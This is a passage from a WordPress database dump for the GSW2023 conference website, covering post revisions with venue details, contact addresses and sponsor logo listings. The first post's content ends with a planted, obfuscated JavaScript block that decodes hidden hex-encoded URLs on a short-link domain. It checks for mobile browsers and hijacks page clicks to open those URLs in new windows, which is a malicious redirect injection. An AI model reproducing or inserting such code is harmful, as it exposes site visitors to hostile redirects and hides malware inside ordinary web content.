width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-26 20:34:14','2023-08-26 20:34:14','',3066,'https://gsw2023.com/?p=5414',0,'revision','',0),
(5415,1,'2023-08-26 20:36:04','2023-08-26 20:36:04','<p><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1692155651924{margin-top: 75px !important;margin-right: -85px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Under the Auspices of </strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\r\n<span style=\"font-size: 24pt;\"><strong>Prime Minister of the </strong><strong>Arab Republic of Egypt</strong></span></h4>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"5267\" img_size=\"250x250\" alignment=\"center\" style=\"vc_box_rounded\" css=\".vc_custom_1692155587524{margin-left: -50px !important;}\"][/vc_column][/vc_row]<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_end\">﻿</span>[vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\r\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\r\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\r\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\r\n<h3 style=\"text-align: center;\"></h3>\r\n<p>&nbsp;</p>\r\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" 